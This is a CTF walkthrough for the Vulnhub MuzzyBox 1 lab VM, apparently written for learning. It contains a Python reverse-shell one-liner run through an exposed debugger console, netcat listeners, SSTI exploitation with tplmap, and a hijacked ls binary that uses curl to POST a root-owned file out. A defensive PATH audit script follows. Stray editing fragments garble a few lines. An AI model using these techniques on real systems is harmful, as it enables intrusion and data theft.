MuzzyBox: 1 Walkthrough Vulnhub CTF

Today we're sharing another Vulnhub CTF walkthrough: MuzzyBox 1, designed by Muzzy. This VM is hosted on Vulnhub; you can download it from the machine link.

Our first step is finding the target IP address.

Network Scanning

After finding the target IP address, we run an aggressive Nmap scan of all ports (the -p- parameter):

nmap -A -p-
From the Nmap scan we found ports 80, 3000, 8989, 9633 and 15000 open, serving HTTP from Python web servers, and port 22 open for SSH.

Opening the target IP in a web browser on port 80, we found an index.txt file listing three challenges:
Challenge 1:
Washington State University has built an online library for its students. Only "Principal" is "Authorized". Are you able to bypass their logic for the flag??
Link: http://{IP}:3000/
Link: http://{IP}:9633/idcard.png

Our first challenge is bypassing the Washington State University ID card database.

On the upload page we can see the ID card, along with the author's note: don't upload the file directly; edit it with your name and then upload it (see the screenshot).

Now we download the ID card to our local machine:

curl --output idcard.png
Now we edit the PNG image; I am using the built-in Windows tool Paint. Recall the note in index.txt: only "Principal" is "Authorized" at Washington State University.

After editing, we upload the file again. The upload succeeds, and we have completed our first challenge.
Challenge 2:
After the data breach the University has developed a new website, but somehow it is still under maintenance. Are you able to list the current directory and read the flag file?
Link: http://{IP}:8989/

Opening the URL in a web browser, we see the Python debugger. Clicking the console opens a new popup window asking for the console password, which we already found in our first challenge.

I wrote a simple Python snippet to list the current directory in the console, and it works:

import os
print(os.listdir('.'))

Next we need to start a netcat listener on a port of our choice (4545 here):

nc -lvp 4545

Then we run a Python socket reverse shell payload in the console:

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4545));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")
Reading our second flag:

cat |more
Challenge 3:
After the system compromise, the root user is auditing the webserver files and directories by using the "bash ls" and "sudo ls" commands. Are you able to get the /root/Final_Flag.txt file using the Out-of-Band technique??
Link: http://{IP}:15000/page?name=muzzy

Our target is vulnerable to Server-Side Template Injection (SSTI). After a search we found an exploitation tool on GitHub:
Server-Side Template Injection Download Tool

Tplmap assists the exploitation of Code Injection and Server-Side Template Injection vulnerabilities with a number of sandbox escape techniques to get access to the underlying operating system.

./ -u'' --os-shell
ls -l ssti
cat ssti/no_flag.txt

Next we log in over SSH with the username nsctf and the password iamnsce:

ssh nsctf@{IP}

With the ls -lsa command we see that the /usr/local/sbin directory belongs to user nsctf, our current user, so we can edit any file in that directory. Recall Challenge 3: are you able to get the /root/Final_Flag.txt file using the Out-of-Band technique?

ls -lsa /usr/local/sbin

Again we start a netcat listener, this time to receive an HTTP POST request:
</gre_replace>
<gr_replace lines="76" cat="clarify" orig="editing the ls command">
We edit the ls command with the nano editor, adding a POST request made with curl:

nc -lvp 4545

editing the ls command with nano editor and creating a post request with the curl command

nano /usr/local/sbin/ls

curl -i -X POST "" --data "@/root/Final_Flag.txt"

When root next runs ls, the request arrives at our listener and we have our final flag.
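The root cause behind Challenge 3 is a privileged PATH directory (/usr/local/sbin) whose files an ordinary user could edit, so root's "sudo ls" ran whatever that user put there. As an added check, not part of the original walkthrough, the following POSIX shell script lists files in such directories that are group- or world-writable, or not owned by the expected uid; the directory list and the expected owner uid 0 are assumptions for a typical Linux host.

```shell
#!/bin/sh
# Added example, not from the walkthrough: find files in PATH-style
# directories that a user other than the expected owner could modify.

# Usage: find_hijackable OWNER_UID DIR...
# Prints one path per line for each regular file directly inside DIR that is
# group-writable, world-writable, or not owned by OWNER_UID. Prints nothing
# when the directories are clean.
find_hijackable() {
    owner_uid=$1
    shift
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        # -perm -0020: group-writable bit set; -perm -0002: world-writable bit set.
        # ! -uid: owner differs from the account expected to control the directory.
        find "$dir" -maxdepth 1 -type f \
            \( -perm -0020 -o -perm -0002 -o ! -uid "$owner_uid" \) 2>/dev/null
    done | sort
}

# Usage: audit_path_dirs OWNER_UID DIR...
# Exit status 0 when there are no findings, 1 otherwise, so it can run from
# cron or a CI job and fail loudly.
audit_path_dirs() {
    findings=$(find_hijackable "$@")
    if [ -n "$findings" ]; then
        printf 'Modifiable by a non-owner (PATH hijack risk):\n%s\n' "$findings"
        return 1
    fi
    return 0
}

# Stand-alone run: check the directories root's PATH usually contains
# (assumed list), expecting uid 0 (root) to own everything in them.
if audit_path_dirs 0 /usr/local/sbin /usr/local/bin /usr/sbin /usr/bin /sbin /bin; then
    echo "privileged PATH directories look clean"
else
    echo "review the entries above and fix ownership/permissions"
fi
```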

